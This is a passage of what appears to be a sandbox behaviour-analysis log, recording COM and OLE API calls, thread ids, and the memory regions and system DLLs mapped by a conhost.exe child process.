CoGetContextToken (in: pToken=0x653f10f550 | out: pToken=0x653f10f550) returned 0x0 [0228.039] CObjectContext::QueryInterface () returned 0x0 [0228.039] CObjectContext::GetCurrentThreadType () returned 0x0 [0228.039] Release () returned 0x0 [0228.039] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0228.039] CoUninitialize () [0228.039] RoInitialize () returned 0x1 [0228.039] RoUninitialize () returned 0x0 [0255.560] CoUninitialize () Thread: id = 40 os_tid = 0x1270 Thread: id = 41 os_tid = 0x12b8 Thread: id = 42 os_tid = 0x12c4 [0239.953] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0239.953] RoInitialize () returned 0x1 [0239.953] RoUninitialize () returned 0x0 [0239.957] ResetEvent (hEvent=0x6f4) returned 1 Thread: id = 43 os_tid = 0x1390 [0262.236] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0262.238] CoGetContextToken (in: pToken=0x653f2cf300 | out: pToken=0x653f2cf300) returned 0x0 [0262.238] CObjectContext::QueryInterface () returned 0x0 [0262.238] CObjectContext::GetCurrentThreadType () returned 0x0 [0262.238] Release () returned 0x0 [0262.238] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0262.238] CoUninitialize () [0262.238] RoInitialize () returned 0x1 [0262.238] RoUninitialize () returned 0x0 Thread: id = 44 os_tid = 0x11ac Thread: id = 45 os_tid = 0x11a4 [0262.243] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0262.244] CoGetContextToken (in: pToken=0x653f38f540 | out: pToken=0x653f38f540) returned 0x0 [0262.244] CObjectContext::QueryInterface () returned 0x0 [0262.244] CObjectContext::GetCurrentThreadType () returned 0x0 [0262.244] Release () returned 0x0 [0262.244] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0262.244] CoUninitialize () [0262.244] RoInitialize () returned 0x1 [0262.244] RoUninitialize () returned 0x0 [0279.217] VarR8FromDec (in: pdecIn=0x653f38e408, pdblOut=0x653f38e380 | out: pdblOut=0x653f38e380) returned 0x0 [0279.221] VarR8FromDec (in: pdecIn=0x653f38e420, pdblOut=0x653f38e3a0 | out: pdblOut=0x653f38e3a0) returned 0x0 [0279.221] VarR8FromDec (in: pdecIn=0x653f38e408, pdblOut=0x653f38e380 | out: pdblOut=0x653f38e380) returned 0x0 [0279.221] VarR8FromDec (in: pdecIn=0x653f38e420, pdblOut=0x653f38e3a0 | out: pdblOut=0x653f38e3a0) returned 0x0 [0279.221] VarR8FromDec (in: pdecIn=0x653f38e408, pdblOut=0x653f38e380 | out: pdblOut=0x653f38e380) returned 0x0 [0279.338] VarDecCmp (pdecLeft=0x653f38e158, pdecRight=0x653f38e148) returned 0x0 [0279.338] VarDecCmp (pdecLeft=0x653f38e158, pdecRight=0x653f38e148) returned 0x0 [0279.338] VarDecCmp (pdecLeft=0x653f38e158, pdecRight=0x653f38e148) returned 0x0 [0279.338] VarDecCmp (pdecLeft=0x653f38e1b8, pdecRight=0x653f38e1a8) returned 0x0 [0279.338] VarDecCmp (pdecLeft=0x653f38e1b8, pdecRight=0x653f38e1a8) returned 0x1 [0279.338] VarDecCmp (pdecLeft=0x653f38e198, pdecRight=0x653f38e188) returned 0x1 [0279.338] VarDecCmp (pdecLeft=0x653f38e1b8, pdecRight=0x653f38e1a8) returned 0x0 [0279.339] VarDecCmp (pdecLeft=0x653f38e1b8, pdecRight=0x653f38e1a8) returned 0x1 [0279.339] VarDecCmp (pdecLeft=0x653f38e198, pdecRight=0x653f38e188) returned 0x1 [0279.346] VarDecCmp (pdecLeft=0x653f38e370, pdecRight=0x653f38e360) returned 0x0 [0279.346] VarDecCmp (pdecLeft=0x653f38e350, pdecRight=0x653f38e340) returned 0x2 [0279.346] VarDecCmp (pdecLeft=0x653f38e370, pdecRight=0x653f38e360) returned 0x0 [0279.346] VarDecCmp (pdecLeft=0x653f38e350, pdecRight=0x653f38e340) returned 0x2 [0279.346] VarDecCmp (pdecLeft=0x653f38e330, pdecRight=0x653f38e320) returned 0x1 [0279.348] VarDecCmp (pdecLeft=0x653f38e2c0, pdecRight=0x653f38e2b0) returned 0x1 [0279.348] VarDecCmp (pdecLeft=0x653f38e2c0, pdecRight=0x653f38e2b0) returned 0x1 [0279.348] VarDecCmp (pdecLeft=0x653f38e2c0, pdecRight=0x653f38e2b0) returned 0x1 Thread: id = 46 os_tid = 0xbd0 Thread: id = 47 os_tid = 0x75c Thread: id = 48 os_tid = 0x1340 Thread: id = 49 os_tid = 0x128c Thread: id = 50 os_tid = 0x131c Thread: id = 51 os_tid = 0x1318 [0286.241] CoGetContextToken (in: pToken=0x653f54eff0 | out: pToken=0x653f54eff0) returned 0x0 [0286.241] CObjectContext::QueryInterface () returned 0x0 [0286.241] CObjectContext::GetCurrentThreadType () returned 0x0 [0286.241] Release () returned 0x0 [0286.306] CoGetContextToken (in: pToken=0x653f54eff0 | out: pToken=0x653f54eff0) returned 0x0 [0286.306] CObjectContext::QueryInterface () returned 0x0 [0286.306] CObjectContext::GetCurrentThreadType () returned 0x0 [0286.306] Release () returned 0x0 Thread: id = 52 os_tid = 0x1310 [0283.271] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0283.273] CoGetContextToken (in: pToken=0x653f5cf520 | out: pToken=0x653f5cf520) returned 0x0 [0283.273] CObjectContext::QueryInterface () returned 0x0 [0283.273] CObjectContext::GetCurrentThreadType () returned 0x0 [0283.273] Release () returned 0x0 [0283.273] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0283.273] CoUninitialize () [0283.273] RoInitialize () returned 0x1 [0283.273] RoUninitialize () returned 0x0 Thread: id = 53 os_tid = 0x8ac Thread: id = 54 os_tid = 0x1268 Process: id = "3" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2e725000" os_pid = "0x614" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x61c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ebd3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 727 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 728 start_va = 0xcf73b20000 end_va = 0xcf73b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000cf73b20000" filename = "" Region: id = 729 start_va = 0xcf73c00000 end_va = 0xcf73dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000cf73c00000" filename = "" Region: id = 730 start_va = 0x2a1909b0000 end_va = 0x2a1909cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002a1909b0000" filename = "" Region: id = 731 start_va = 0x2a1909d0000 end_va = 0x2a1909e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002a1909d0000" filename = "" Region: id = 732 start_va = 0x7df5ff7d0000 end_va = 0x7ff5ff7cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff7d0000" filename = "" Region: id = 733 start_va = 0x7ff616ba0000 end_va = 0x7ff616bc2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff616ba0000" filename = "" Region: id = 734 start_va = 0x7ff617080000 end_va = 0x7ff617090fff monitored = 0 entry_point = 0x7ff6170816b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 735 start_va = 0x7ffff07a0000 end_va = 0x7ffff0960fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 736 start_va = 0x2a1909f0000 end_va = 0x2a190c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002a1909f0000" filename = "" Region: id = 737 start_va = 0x7fffefeb0000 end_va = 0x7fffeff5cfff monitored = 0 entry_point = 0x7fffefec81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 738 start_va = 0x7fffece50000 end_va = 0x7fffed037fff monitored = 0 entry_point = 0x7fffece7ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 739 start_va = 0x2a1909b0000 end_va = 0x2a1909bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002a1909b0000" filename = "" Region: id = 740 start_va = 0x7ff616aa0000 end_va = 0x7ff616b9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff616aa0000" filename = "" Region: id = 741 start_va = 0x2a1909f0000 end_va = 0x2a190aadfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 742 start_va = 0x2a190b90000 end_va = 0x2a190c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002a190b90000" filename = "" Region: id = 743 start_va = 0x7ffff0700000 end_va = 0x7ffff079cfff monitored = 0 entry_point = 0x7ffff07078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 744 start_va = 0xcf73b60000 end_va = 0xcf73b9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000cf73b60000" filename = "" Region: id = 745 start_va = 0x2a190c90000 end_va = 0x2a190d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002a190c90000" filename = "" Region: id = 746 start_va = 0x2a1909c0000 end_va = 0x2a1909c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002a1909c0000" filename = "" Region: id = 747 start_va = 0x7fffe4a60000 end_va = 0x7fffe4ab8fff monitored = 0 entry_point = 0x7fffe4a6fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 748 start_va = 0x2a190ab0000 end_va = 0x2a190ab0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002a190ab0000" filename = "" Region: id = 749 start_va = 0x7fffef9f0000 end_va = 0x7fffefc6cfff monitored = 0 entry_point = 0x7fffefac4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 750 start_va = 0x7fffefd90000 end_va = 0x7fffefeabfff monitored = 0 entry_point = 0x7fffefdd02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 751 start_va = 0x7fffed740000 end_va = 0x7fffed7a9fff monitored = 0 entry_point = 0x7fffed776d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 752 start_va = 0x7fffeff60000 end_va = 0x7ffff00b5fff monitored = 0 entry_point = 0x7fffeff6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 753 start_va = 0x7ffff0340000 end_va = 0x7ffff04c5fff monitored = 0 entry_point = 0x7ffff038ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 754 start_va = 0x2a190ac0000 end_va = 0x2a190ac6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002a190ac0000" filename = "" Region: id = 755 start_va = 0x7ffff05b0000 end_va = 0x7ffff06f2fff monitored = 0 entry_point = 0x7ffff05d8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 756 start_va = 0x7fffedba0000 end_va = 0x7fffedbfafff monitored = 0 entry_point = 0x7fffedbb38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 757 start_va = 0x7fffedf50000 end_va = 0x7fffedf8afff monitored = 0 entry_point = 0x7fffedf512f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 758 start_va = 0x7ffff00c0000 end_va = 0x7ffff0180fff monitored = 0 entry_point = 0x7ffff00e0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 759 start_va = 0x7fffeb310000 end_va = 0x7fffeb495fff monitored = 0 entry_point = 0x7fffeb35d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 760 start_va = 0x2a190ad0000 end_va = 0x2a190ad0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002a190ad0000" filename = "" Region: id = 761 start_va = 0x2a190ae0000 end_va = 0x2a190ae0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002a190ae0000" filename = "" Region: id = 762 start_va = 0x2a190da0000 end_va = 0x2a190f27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002a190da0000" filename = "" Region: id = 763 start_va = 0x2a190f30000 end_va = 0x2a1910b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002a190f30000" filename = "" Region: id = 764 start_va = 0x2a1910c0000 end_va = 0x2a1924bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002a1910c0000" filename = "" Region: id = 765 start_va = 0x2a190c90000 end_va = 0x2a190d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002a190c90000" filename = "" Region: id = 766 start_va = 0x2a190d90000 end_va = 0x2a190d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002a190d90000" filename = "" Region: id = 767 start_va = 0xcf73ba0000 end_va = 0xcf73bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000cf73ba0000" filename = "" Region: id = 768 start_va = 0x7fffee060000 end_va = 0x7fffef5befff monitored = 0 entry_point = 0x7fffee1c11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 769 start_va = 0x7fffed8f0000 end_va = 0x7fffed932fff monitored = 0 entry_point = 0x7fffed904b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 770 start_va = 0x7fffed0f0000 end_va = 0x7fffed733fff monitored = 0 entry_point = 0x7fffed2b64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 771 start_va = 0x7fffedd80000 end_va = 0x7fffede26fff monitored = 0 entry_point = 0x7fffedd958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 772 start_va = 0x7fffedee0000 end_va = 0x7fffedf31fff monitored = 0 entry_point = 0x7fffedeef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 773 start_va = 0x7fffece40000 end_va = 0x7fffece4efff monitored = 0 entry_point = 0x7fffece43210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 774 start_va = 0x7fffed810000 end_va = 0x7fffed8c4fff monitored = 0 entry_point = 0x7fffed8522e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 775 start_va = 0x7fffecde0000 end_va = 0x7fffece2afff monitored = 0 entry_point = 0x7fffecde35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 776 start_va = 0x7fffecdc0000 end_va = 0x7fffecdd3fff monitored = 0 entry_point = 0x7fffecdc52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 777 start_va = 0x7fffeb740000 end_va = 0x7fffeb7d5fff monitored = 0 entry_point = 0x7fffeb765570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 778 start_va = 0x2a190af0000 end_va = 0x2a190b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002a190af0000" filename = "" Region: id = 779 start_va = 0x2a1924c0000 end_va = 0x2a1927f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 780 start_va = 0x2a192800000 end_va = 0x2a1928fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002a192800000" filename = "" Region: id = 781 start_va = 0x2a192900000 end_va = 0x2a192afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002a192900000" filename = "" Region: id = 782 start_va = 0xcf73e00000 end_va = 0xcf73e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000cf73e00000" filename = "" Region: id = 783 start_va = 0x7fffedc00000 end_va = 0x7fffedd59fff monitored = 0 entry_point = 0x7fffedc438e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 784 start_va = 0x2a190af0000 end_va = 0x2a190af0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002a190af0000" filename = "" Region: id = 785 start_va = 0x2a190b80000 end_va = 0x2a190b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002a190b80000" filename = "" Region: id = 786 start_va = 0x2a190c90000 end_va = 0x2a190d4bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002a190c90000" filename = "" Region: id = 787 start_va = 0x2a190d50000 end_va = 0x2a190d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002a190d50000" filename = "" Region: id = 788 start_va = 0x2a190af0000 end_va = 0x2a190af3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002a190af0000" filename = "" Region: id = 789 start_va = 0x7fffea640000 end_va = 0x7fffea661fff monitored = 0 entry_point = 0x7fffea641a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 790 start_va = 0x7fffeb500000 end_va = 0x7fffeb512fff monitored = 0 entry_point = 0x7fffeb502760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 791 start_va = 0x7fffec960000 end_va = 0x7fffec9b5fff monitored = 0 entry_point = 0x7fffec970bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 792 start_va = 0x2a190b00000 end_va = 0x2a190b06fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002a190b00000" filename = "" Region: id = 793 start_va = 0x2a190b10000 end_va = 0x2a190b10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002a190b10000" filename = "" Region: id = 794 start_va = 0x2a190b20000 end_va = 0x2a190b20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002a190b20000" filename = "" Region: id = 795 start_va = 0x2a190b30000 end_va = 0x2a190b34fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 796 start_va = 0x2a190b40000 end_va = 0x2a190b40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 797 start_va = 0x2a190b50000 end_va = 0x2a190b51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002a190b50000" filename = "" Region: id = 798 start_va = 0x2a192b00000 end_va = 0x2a192eedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002a192b00000" filename = "" Region: id = 799 start_va = 0x7fffe3a00000 end_va = 0x7fffe3c73fff monitored = 0 entry_point = 0x7fffe3a70400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 800 start_va = 0x2a190b60000 end_va = 0x2a190b60fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 801 start_va = 0x2a190b70000 end_va = 0x2a190b71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002a190b70000" filename = "" Region: id = 802 start_va = 0x2a192ef0000 end_va = 0x2a192fccfff monitored = 0 entry_point = 0x2a192f4e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 803 start_va = 0x2a190b60000 end_va = 0x2a190b60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002a190b60000" filename = "" Region: id = 804 start_va = 0x2a192ef0000 end_va = 0x2a192feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002a192ef0000" filename = "" Region: id = 805 start_va = 0x2a192ff0000 end_va = 0x2a1933ecfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002a192ff0000" filename = "" Thread: id = 21 os_tid = 0x11f4 Thread: id = 22 os_tid = 0x11e0 Thread: id = 23 os_tid = 0x11e8 Thread: id = 24 os_tid = 0x11ec